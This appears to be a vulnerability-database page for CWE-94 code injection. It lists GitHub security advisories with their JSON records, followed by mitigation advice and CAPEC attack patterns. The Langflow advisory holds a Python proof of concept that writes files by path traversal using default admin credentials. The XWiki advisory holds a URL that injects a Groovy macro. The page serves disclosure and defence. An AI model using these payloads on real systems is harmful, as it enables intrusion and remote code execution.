Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8272 vulnerabilities reference this CWE, most recent first.

GHSA-FXW5-MP3X-JPJ6

Vulnerability from github – Published: 2022-05-01 23:40 – Updated: 2022-05-01 23:40
VLAI
Details

Multiple PHP remote file inclusion vulnerabilities in PHPauction GPL 2.51 allow remote attackers to execute arbitrary PHP code via a URL in the include_path parameter to (1) converter.inc.php, (2) messages.inc.php, and (3) settings.inc.php in includes/.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-1416"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-03-20T10:44:00Z",
    "severity": "MODERATE"
  },
  "details": "Multiple PHP remote file inclusion vulnerabilities in PHPauction GPL 2.51 allow remote attackers to execute arbitrary PHP code via a URL in the include_path parameter to (1) converter.inc.php, (2) messages.inc.php, and (3) settings.inc.php in includes/.",
  "id": "GHSA-fxw5-mp3x-jpj6",
  "modified": "2022-05-01T23:40:02Z",
  "published": "2022-05-01T23:40:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-1416"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41239"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/5266"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/29422"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/28284"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2008/0908/references"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FXW8-977W-4484

Vulnerability from github – Published: 2022-12-02 00:30 – Updated: 2025-04-24 18:30
VLAI
Details

Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-43333"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-01T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.",
  "id": "GHSA-fxw8-977w-4484",
  "modified": "2025-04-24T18:30:58Z",
  "published": "2022-12-02T00:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43333"
    },
    {
      "type": "WEB",
      "url": "https://www.swascan.com/it/security-advisory-telenia-software-tvox"
    },
    {
      "type": "WEB",
      "url": "https://www.teleniasoftware.com/timeline/tvox-22-0-23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FXX2-G3VH-J258

Vulnerability from github – Published: 2022-05-17 01:52 – Updated: 2022-05-17 01:52
VLAI
Details

IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2011-4668"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-12-02T11:55:00Z",
    "severity": "HIGH"
  },
  "details": "IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.",
  "id": "GHSA-fxx2-g3vh-j258",
  "modified": "2022-05-17T01:52:02Z",
  "published": "2022-05-17T01:52:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4668"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71663"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/77402"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/46999"
    },
    {
      "type": "WEB",
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24031456"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=swg1IZ94277"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/50864"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-G2H3-68XR-M8J6

Vulnerability from github – Published: 2022-05-24 17:35 – Updated: 2025-08-29 00:31
VLAI
Details

, aka 'Visual Studio Code Remote Code Execution Vulnerability'.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-17150"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-10T00:15:00Z",
    "severity": "HIGH"
  },
  "details": ", aka \u0027Visual Studio Code Remote Code Execution Vulnerability\u0027.",
  "id": "GHSA-g2h3-68xr-m8j6",
  "modified": "2025-08-29T00:31:13Z",
  "published": "2022-05-24T17:35:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17150"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17150"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-G2J9-7RJ2-GM6C

Vulnerability from github – Published: 2026-03-19 17:46 – Updated: 2026-06-06 00:55
VLAI
Summary
Langflow has an Arbitrary File Write (RCE) via v2 API
Details

Summary

While reviewing the recent patch for CVE-2025-68478 (External Control of File Name in v1.7.1), I discovered that the root architectural issue within LocalStorageService remains unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer ValidatedFileName dependency.

This defense-in-depth failure leaves the POST /api/v2/files/ endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE).

Details

The vulnerability exists in two layers:

  1. API Layer (src/backend/base/langflow/api/v2/files.py:162): Inside the upload_user_file route, the filename is extracted directly from the multipart Content-Disposition header (new_filename = file.filename). It is passed verbatim to the storage service. ValidatedFileName provides zero protection here as it only guards URL path parameters.
  2. Storage Layer (src/backend/base/langflow/services/storage/local.py:114-116): The LocalStorageService uses naive path concatenation (file_path = folder_path / file_name). It lacks a resolve().is_relative_to(base_dir) containment check.

Recommended Fix:

  1. Sanitize the multipart filename before processing:
from pathlib import Path as StdPath
new_filename = StdPath(file.filename or "").name # Strips directory traversal characters
if not new_filename or ".." in new_filename:
    raise HTTPException(status_code=400, detail="Invalid file name")

  1. Add a canonical path containment check inside LocalStorageService.save_file to permanently kill this vulnerability class.

PoC

This Python script verifies the vulnerability against langflowai/langflow:latest (v1.7.3) by writing a file outside the user's UUID storage directory.

import requests

BASE_URL = "http://localhost:7860"
# Authenticate to get a valid JWT
token = requests.post(f"{BASE_URL}/api/v1/login", data={"username": "admin", "password": "admin"}).json()["access_token"]

# Payload using directory traversal in the multipart filename
TRAVERSAL_FILENAME = "../../traversal_proof.txt"
SENTINEL_CONTENT = b"CVE_RESEARCH_SENTINEL_KEY"

resp = requests.post(
    f"{BASE_URL}/api/v2/files/",
    headers={"Authorization": f"Bearer {token}"},
    files={"file": (TRAVERSAL_FILENAME, SENTINEL_CONTENT, "text/plain")},
)

print(f"Status: {resp.status_code}") # Returns 201
# The file is successfully written to `/app/data/.cache/langflow/traversal_proof.txt`

Server Logs:

2026-02-19T10:04:54.031888Z [info     ] File ../traversal_proof.txt saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb.
2026-02-19T10:05:51.792520Z [info     ] File secret_image.png saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb.

Docker cntainer file:

user@40416f6848f2:~/.cache/langflow$ ls
3668bcce-db6c-4f58-834c-f49ba0024fcb  profile_pictures  secret_key  traversal_proof.txt

Impact

Authenticated Arbitrary File Write. An attacker can overwrite critical system files, inject malicious Python components, or overwrite .ssh/authorized_keys to achieve full Remote Code Execution on the host server.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "fixed": "1.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33309"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-284",
      "CWE-73",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T17:46:43Z",
    "nvd_published_at": "2026-03-24T13:16:02Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nWhile reviewing the recent patch for **CVE-2025-68478** (External Control of File Name in v1.7.1), I discovered that the root architectural issue within `LocalStorageService` remains unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer `ValidatedFileName` dependency.\n\nThis defense-in-depth failure leaves the `POST /api/v2/files/` endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE).\n\n### Details\nThe vulnerability exists in two layers:\n\n1. **API Layer (`src/backend/base/langflow/api/v2/files.py:162`)**: Inside the `upload_user_file` route, the `filename` is extracted directly from the multipart `Content-Disposition` header (`new_filename = file.filename`). It is passed verbatim to the storage service. `ValidatedFileName` provides zero protection here as it only guards URL path parameters.\n2. **Storage Layer (`src/backend/base/langflow/services/storage/local.py:114-116`)**: The `LocalStorageService` uses naive path concatenation (`file_path = folder_path / file_name`). It lacks a `resolve().is_relative_to(base_dir)` containment check.\n\n**Recommended Fix:**\n\n1. Sanitize the multipart filename before processing:\n\n```python\nfrom pathlib import Path as StdPath\nnew_filename = StdPath(file.filename or \"\").name # Strips directory traversal characters\nif not new_filename or \"..\" in new_filename:\n    raise HTTPException(status_code=400, detail=\"Invalid file name\")\n\n```\n\n2. Add a canonical path containment check inside `LocalStorageService.save_file` to permanently kill this vulnerability class.\n\n### PoC\nThis Python script verifies the vulnerability against `langflowai/langflow:latest` (v1.7.3) by writing a file outside the user\u0027s UUID storage directory.\n\n```python\nimport requests\n\nBASE_URL = \"http://localhost:7860\"\n# Authenticate to get a valid JWT\ntoken = requests.post(f\"{BASE_URL}/api/v1/login\", data={\"username\": \"admin\", \"password\": \"admin\"}).json()[\"access_token\"]\n\n# Payload using directory traversal in the multipart filename\nTRAVERSAL_FILENAME = \"../../traversal_proof.txt\"\nSENTINEL_CONTENT = b\"CVE_RESEARCH_SENTINEL_KEY\"\n\nresp = requests.post(\n    f\"{BASE_URL}/api/v2/files/\",\n    headers={\"Authorization\": f\"Bearer {token}\"},\n    files={\"file\": (TRAVERSAL_FILENAME, SENTINEL_CONTENT, \"text/plain\")},\n)\n\nprint(f\"Status: {resp.status_code}\") # Returns 201\n# The file is successfully written to `/app/data/.cache/langflow/traversal_proof.txt`\n\n```\n\nServer Logs:\n```\n2026-02-19T10:04:54.031888Z [info     ] File ../traversal_proof.txt saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb.\n2026-02-19T10:05:51.792520Z [info     ] File secret_image.png saved successfully in flow 3668bcce-db6c-4f58-834c-f49ba0024fcb.\n```\nDocker cntainer file:\n```\nuser@40416f6848f2:~/.cache/langflow$ ls\n3668bcce-db6c-4f58-834c-f49ba0024fcb  profile_pictures\tsecret_key  traversal_proof.txt\n```\n\n### Impact\nAuthenticated Arbitrary File Write. An attacker can overwrite critical system files, inject malicious Python components, or overwrite `.ssh/authorized_keys` to achieve full Remote Code Execution on the host server.",
  "id": "GHSA-g2j9-7rj2-gm6c",
  "modified": "2026-06-06T00:55:50Z",
  "published": "2026-03-19T17:46:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33309"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2026-79.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow has an Arbitrary File Write (RCE) via v2 API"
}

GHSA-G2PM-CQXG-6233

Vulnerability from github – Published: 2022-05-01 07:09 – Updated: 2022-05-01 07:09
VLAI
Details

PHP remote file inclusion vulnerability in com_pccookbook/pccookbook.php in the PccookBook Component for Mambo and Joomla 0.3 and possibly up to 1.3.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the mosConfig_absolute_path parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-3530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-07-12T21:05:00Z",
    "severity": "MODERATE"
  },
  "details": "PHP remote file inclusion vulnerability in com_pccookbook/pccookbook.php in the PccookBook Component for Mambo and Joomla 0.3 and possibly up to 1.3.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the mosConfig_absolute_path parameter.",
  "id": "GHSA-g2pm-cqxg-6233",
  "modified": "2022-05-01T07:09:56Z",
  "published": "2022-05-01T07:09:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-3530"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27641"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/2024"
    },
    {
      "type": "WEB",
      "url": "http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/21015"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/1215"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/439618/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/18919"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/2739"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-G2PV-76HM-J4X9

Vulnerability from github – Published: 2026-07-01 00:34 – Updated: 2026-07-01 00:34
VLAI
Details

Crawl4AI before 0.8.7 contains an arbitrary JavaScript execution vulnerability in the Docker API server's /execute_js endpoint, which accepts and executes arbitrary user-supplied JavaScript in the server's browser context with --disable-web-security enabled. An attacker can execute arbitrary JavaScript and, combined with the browser's relaxed security settings, perform server-side request forgery against internal services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-56264"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T23:17:29Z",
    "severity": "CRITICAL"
  },
  "details": "Crawl4AI before 0.8.7 contains an arbitrary JavaScript execution vulnerability in the Docker API server\u0027s /execute_js endpoint, which accepts and executes arbitrary user-supplied JavaScript in the server\u0027s browser context with --disable-web-security enabled. An attacker can execute arbitrary JavaScript and, combined with the browser\u0027s relaxed security settings, perform server-side request forgery against internal services.",
  "id": "GHSA-g2pv-76hm-j4x9",
  "modified": "2026-07-01T00:34:13Z",
  "published": "2026-07-01T00:34:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56264"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/crawl4ai-arbitrary-javascript-execution-via-execute-js-endpoint"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-G2QQ-C5J9-5W5W

Vulnerability from github – Published: 2023-11-07 23:02 – Updated: 2023-11-15 18:32
VLAI
Summary
XWiki Platform vulnerable to privilege escalation and remote code execution via the edit action
Details

Impact

In XWiki Platform, it's possible for a user to execute any content with the right of an existing document's content author, provided the user have edit right on it. The reason for this is that the edit action sets the content without modifying the content author.

To reproduce: * Log in as a user without programming or script right. * Open the URL <xwiki-host>/xwiki/bin/edit/<document>/?content=%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D&xpage=view, where <xwiki-host> is the URL of your XWiki installation and <document> is the path to a document whose content author has programming right (or script right) and on which the current user has edit right.

The text "Hello from Groovy!" is displayed in the page content, showing that the Groovy macro has been executed, which should not be the case for a user without programming right.

Patches

This has been patched in XWiki 14.10.6 and 15.2RC1.

Workarounds

There are no known workarounds for it.

References

  • https://jira.xwiki.org/browse/XWIKI-20385
  • https://github.com/xwiki/xwiki-platform/commit/a0e6ca083b36be6f183b9af33ae735c1e02010f4

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-oldcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0"
            },
            {
              "fixed": "15.2-rc-1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.xwiki.platform:xwiki-platform-oldcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0"
            },
            {
              "fixed": "14.10.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46243"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-07T23:02:57Z",
    "nvd_published_at": "2023-11-07T20:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nIn XWiki Platform, it\u0027s possible for a user to execute any content with the right of an existing document\u0027s content author, provided the user have edit right on it. The reason for this is that the edit action sets the content without modifying the content author.\n\nTo reproduce:\n* Log in as a user without programming or script right.\n* Open the URL `\u003cxwiki-host\u003e/xwiki/bin/edit/\u003cdocument\u003e/?content=%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+Groovy%21%22%29%7B%7B%2Fgroovy%7D%7D\u0026xpage=view`, where `\u003cxwiki-host\u003e` is the URL of your XWiki installation and `\u003cdocument\u003e` is the path to a document whose content author has programming right (or script right) and on which the current user has edit right.\n\nThe text \"Hello from Groovy!\" is displayed in the page content, showing that the Groovy macro has been executed, which should not be the case for a user without programming right.\n\n### Patches\n\nThis has been patched in XWiki 14.10.6 and 15.2RC1.\n\n### Workarounds\n\nThere are no known workarounds for it.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20385\n* https://github.com/xwiki/xwiki-platform/commit/a0e6ca083b36be6f183b9af33ae735c1e02010f4\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)",
  "id": "GHSA-g2qq-c5j9-5w5w",
  "modified": "2023-11-15T18:32:54Z",
  "published": "2023-11-07T23:02:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-g2qq-c5j9-5w5w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46243"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xwiki/xwiki-platform/commit/a0e6ca083b36be6f183b9af33ae735c1e02010f4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xwiki/xwiki-platform"
    },
    {
      "type": "WEB",
      "url": "https://jira.xwiki.org/browse/XWIKI-20385"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XWiki Platform vulnerable to privilege escalation and remote code execution via the edit action"
}

GHSA-G2QQ-QV5M-HCGQ

Vulnerability from github – Published: 2026-05-02 09:31 – Updated: 2026-05-02 09:31
VLAI
Details

The Widget Options – Advanced Conditional Visibility for Gutenberg Blocks & Classic Widgets plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.2 via the Display Logic feature. This is due to the plugin using eval() on user-supplied Display Logic expressions with an insufficient blocklist/allowlist that can be bypassed using array_map with string concatenation, combined with a lack of authorization enforcement on the extended_widget_opts_block attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. The vulnerability was partially patched in version 4.2.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-02T08:16:27Z",
    "severity": "HIGH"
  },
  "details": "The Widget Options \u2013 Advanced Conditional Visibility for Gutenberg Blocks \u0026 Classic Widgets plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.2 via the Display Logic feature. This is due to the plugin using eval() on user-supplied Display Logic expressions with an insufficient blocklist/allowlist that can be bypassed using array_map with string concatenation, combined with a lack of authorization enforcement on the extended_widget_opts_block attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. The vulnerability was partially patched in version 4.2.0.",
  "id": "GHSA-g2qq-qv5m-hcgq",
  "modified": "2026-05-02T09:31:15Z",
  "published": "2026-05-02T09:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2052"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L495"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L534"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/widgets/gutenberg/gutenberg-toolbar.php#L843"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3481338"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3514411"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/68023557-fc92-4cf6-96b4-405ff5a5fd5a?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-G2VM-HCJG-CCH9

Vulnerability from github – Published: 2025-10-22 15:31 – Updated: 2026-01-20 15:31
VLAI
Details

Improper Control of Generation of Code ('Code Injection') vulnerability in Bearsthemes Alone alone allows Code Injection.This issue affects Alone: from n/a through <= 7.8.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-60206"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-22T15:15:57Z",
    "severity": "HIGH"
  },
  "details": "Improper Control of Generation of Code (\u0027Code Injection\u0027) vulnerability in Bearsthemes Alone alone allows Code Injection.This issue affects Alone: from n/a through \u003c= 7.8.3.",
  "id": "GHSA-g2vm-hcjg-cch9",
  "modified": "2026-01-20T15:31:30Z",
  "published": "2025-10-22T15:31:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60206"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/alone/vulnerability/wordpress-alone-theme-7-8-3-remote-code-execution-rce-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Theme/alone/vulnerability/wordpress-alone-theme-7-8-3-remote-code-execution-rce-vulnerability"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Theme/alone/vulnerability/wordpress-alone-theme-7-8-3-remote-code-execution-rce-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.